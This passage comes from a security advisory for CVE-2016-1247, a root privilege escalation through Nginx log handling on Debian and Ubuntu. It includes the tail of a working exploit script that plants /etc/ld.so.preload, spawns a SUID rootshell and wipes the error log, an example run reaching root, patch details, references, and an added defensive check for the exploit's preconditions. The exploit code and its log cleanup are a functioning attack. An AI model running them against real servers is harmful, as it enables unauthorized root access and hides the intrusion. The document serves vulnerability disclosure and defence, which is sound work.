echo -e "\n[+] Nginx restarted. The /etc/ld.so.preload file got created with web server privileges: \n`ls -l /etc/ld.so.preload`"
echo -e "\n[+] Adding $PRIVESCLIB shared lib to /etc/ld.so.preload"
echo -e "\n[+] The /etc/ld.so.preload file now contains: \n`cat /etc/ld.so.preload`"
chmod 755 /etc/ld.so.preload

# Escalating privileges via the SUID binary (e.g. /usr/bin/sudo)
echo -e "\n[+] Escalating privileges via the $SUIDBIN SUID binary to get root!"
sudo 2>/dev/null >/dev/null

# Check for the rootshell
ls -l $BACKDOORPATH
ls -l $BACKDOORPATH | grep rws | grep -q root
if [ $? -eq 0 ]; then
    echo -e "\n[+] Rootshell got assigned root SUID perms at: \n`ls -l $BACKDOORPATH`"
    echo -e "\n\033[94mThe server is (N)jinxed ! ;) Got root via Nginx!\033[0m"
else
    echo -e "\n[!] Failed to get root"
    cleanexit 2
fi
rm -f $ERRORLOG
echo > $ERRORLOG

# Use the rootshell to perform cleanup that requires root privileges
$BACKDOORPATH -p -c "rm -f /etc/ld.so.preload; rm -f $PRIVESCLIB"
# Reset the logging to error.log
$BACKDOORPATH -p -c "kill -USR1 `pidof -s nginx`"

# Execute the rootshell
echo -e "\n[+] Spawning the rootshell $BACKDOORPATH now! \n"
$BACKDOORPATH -p -i

# Job done.
cleanexit 0

---------------------------------------------------
```

Example run
~~~~~~~~~~~~~

```
www-data@jessie:~/html/poc-app/uploads$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)

www-data@jessie:~/html/poc-app/uploads$ dpkg -l | grep -i nginx
ii  nginx           1.6.2-5+deb8u2     all    small, powerful, scalable web/proxy server
ii  nginx-common    1.6.2-5+deb8u2     all    small, powerful, scalable web/proxy server - common files
ii  nginx-full      1.6.2-5+deb8u2+b1  amd64  nginx web/proxy server (standard version)

www-data@jessie:~/html/poc-app/uploads$ ls -ld /var/log/nginx
drwxr-x--- 2 www-data adm 4096 Nov 15 23:38 /var/log/nginx

www-data@jessie:~/html/poc-app/uploads$ ./nginxed-root.sh /var/log/nginx/error.log
 _______________________________
< Is your server (N)jinxed ? ;o >
 -------------------------------
                         \
                          \
                           __---__
                        _-       /--______
                   __--( /     \ )XXXXXXXXXXX\v.
                 .-XXX(   O   O  )XXXXXXXXXXXXXXX-
                /XXX(       U     )        XXXXXXX\
              /XXXXX(              )--_  XXXXXXXXXXX\
             /XXXXX/ (      O     )   XXXXXX   \XXXXX\
             XXXXX/   /            XXXXXX   \__ \XXXXX
             XXXXXX__/          XXXXXX         \__---->
     ---___  XXX__/          XXXXXX      \__         /
       \-  --__/   ___/\  XXXXXX            /  ___--/=
        \-\    ___/    XXXXXX              '--- XXXXXX
           \-\/XXX\ XXXXXX                      /XXXXX
             \XXXXXXXXX   \                    /XXXXX/
              \XXXXXX      >                 _/XXXXX/
                \XXXXX--__/              __-- XXXX/
                  -XXXXXXXX---------------  XXXXXX-
                     \XXXXXXXXXXXXXXXXXXXXXXXXXX/
                       ""VXXXXXXXXXXXXXXXXXXV""

Nginx (Debian-based distros) - Root Privilege Escalation PoC Exploit (CVE-2016-1247)
nginxed-root.sh (ver. 1.0)

Discovered and coded by:

Dawid Golunski
https://legalhackers.com

[+] Starting the exploit as:
uid=33(www-data) gid=33(www-data) groups=33(www-data)

[+] Compiling the privesc shared library (/tmp/privesclib.c)

[+] Backdoor/low-priv shell installed at:
-rwxr-xr-x 1 www-data www-data 1029624 Nov 15 23:54 /tmp/nginxrootsh

[+] The server appears to be (N)jinxed (writable logdir) ! :) Symlink created at:
lrwxrwxrwx 1 www-data www-data 18 Nov 15 23:54 /var/log/nginx/error.log -> /etc/ld.so.preload

[+] Waiting for Nginx service to be restarted (-USR1) by logrotate called from cron.daily at 6:25am...

[+] Nginx restarted. The /etc/ld.so.preload file got created with web server privileges:
-rw-r--r-- 1 www-data root 19 Nov 15 23:55 /etc/ld.so.preload

[+] Adding /tmp/privesclib.so shared lib to /etc/ld.so.preload

[+] The /etc/ld.so.preload file now contains:
/tmp/privesclib.so

[+] Escalating privileges via the /usr/bin/sudo SUID binary to get root!
-rwsrwxrwx 1 root root 1029624 Nov 15 23:54 /tmp/nginxrootsh

[+] Rootshell got assigned root SUID perms at:
-rwsrwxrwx 1 root root 1029624 Nov 15 23:54 /tmp/nginxrootsh

The server is (N)jinxed ! ;) Got root via Nginx!

[+] Spawning the rootshell /tmp/nginxrootsh now!

nginxrootsh-4.3# id
uid=33(www-data) gid=33(www-data) euid=0(root) groups=33(www-data)
nginxrootsh-4.3# whoami
root
```

Note: You can force log rotation during testing with:

logrotate -f /etc/logrotate.d/nginx

Video PoC:
~~~~~~~~~~~~~
https://legalhackers.com/videos/Nginx-Exploit-Deb-Root-PrivEsc-CVE-2016-1247.html

VI. BUSINESS IMPACT
-------------------------

An attacker who has managed to exploit a vulnerable web application could use the vulnerability to escalate their privileges to root.

VII. SYSTEMS AFFECTED
-------------------------

Debian: Fixed in Nginx 1.6.2-5+deb8u3

Ubuntu: Fixed in the following updated Nginx package versions on Ubuntu:
Ubuntu 16.04 LTS: 1.10.0-0ubuntu0.16.04.3
Ubuntu 14.04 LTS: 1.4.6-1ubuntu3.6
Ubuntu 16.10: 1.10.1-0ubuntu1.1

VIII. SOLUTION
-------------------------

Vendors were sent this advisory in advance and released patches prior to the publication of the exploit. Update to the latest nginx packages on your distribution.

https://www.debian.org/security/2016/dsa-3701
https://www.ubuntu.com/usn/usn-3114-1/

IX. REFERENCES
-------------------------

https://legalhackers.com

This advisory:
https://legalhackers.com/advisories/Nginx-Exploit-Deb-Root-PrivEsc-CVE-2016-1247.html

Exploit code:
https://legalhackers.com/exploits/CVE-2016-1247/nginxed-root.sh

CVE-2016-1247:
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-1247

Video PoC:
https://legalhackers.com/videos/Nginx-Exploit-Deb-Root-PrivEsc-CVE-2016-1247.html

Debian security:
https://www.debian.org/security/2016/dsa-3701
https://security-tracker.debian.org/tracker/CVE-2016-1247

Ubuntu security:
https://www.ubuntu.com/usn/usn-3114-1/

X. CREDITS
-------------------------

The vulnerability has been discovered by Dawid Golunski
dawid (at) legalhackers (dot) com
https://legalhackers.com

XI. REVISION HISTORY
-------------------------

15.11.2016 - Advisory released

XII. LEGAL NOTICES
-------------------------

The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. I accept no responsibility for any damage caused by the use or misuse of this information.
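Added defender-side check, written for this record and not part of the advisory or the exploit above: a POSIX shell function (hypothetical name check_nginx_logdir) that reports the three conditions the advisory's chain depends on, a log directory owned by the web server user, a log file replaced by a symlink, and an /etc/ld.so.preload not owned by root. Directory, user name and preload path are parameters so it can be pointed at a test tree; it assumes GNU stat (Linux).

```shell
#!/bin/sh
# Added check for the CVE-2016-1247 preconditions and footprint (not from the
# advisory). Findings, one per line on stdout:
#   WARN  - the log directory is owned by the web server user, which is what
#           lets that user replace error.log (fixed packages use root:adm)
#   ALERT - a log file in the directory is a symlink (error.log pointing at
#           /etc/ld.so.preload in the example run above)
#   ALERT - the preload file exists and is not owned by root
# Returns 1 if anything was found, 0 if clean. Uses GNU stat -c.
check_nginx_logdir() {
    logdir="$1"     # e.g. /var/log/nginx
    webuser="$2"    # e.g. www-data
    preload="$3"    # e.g. /etc/ld.so.preload
    found=0

    if [ -d "$logdir" ]; then
        if [ "$(stat -c '%U' "$logdir")" = "$webuser" ]; then
            echo "WARN: $logdir is owned by $webuser; $webuser can replace its log files"
            found=1
        fi
        for f in "$logdir"/*; do
            # -L rather than -e: a dangling symlink is still a finding
            if [ -L "$f" ]; then
                echo "ALERT: $f is a symlink -> $(readlink "$f")"
                found=1
            fi
        done
    fi

    # stat without -L reports the owner of the file itself, not of a link target
    if [ -e "$preload" ] || [ -L "$preload" ]; then
        powner=$(stat -c '%U' "$preload")
        if [ "$powner" != "root" ]; then
            echo "ALERT: $preload exists and is owned by $powner, not root"
            found=1
        fi
    fi
    return $found
}

# Stand-alone usage: sh check.sh /var/log/nginx www-data /etc/ld.so.preload
if [ $# -eq 3 ]; then
    check_nginx_logdir "$1" "$2" "$3"
fi
```

On a patched Debian jessie host the directory should be root:adm, so only the WARN line distinguishes a vulnerable layout; the two ALERT lines are post-exploitation footprint.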
id: SSV:92538
last seen: 2017-11-19
modified: 2016-11-16
published: 2016-11-16
reporter: Root
source: https://www.seebug.org/vuldb/ssvid-92538
title: Nginx privilege elevation vulnerability (Debian, Ubuntu distributions)

References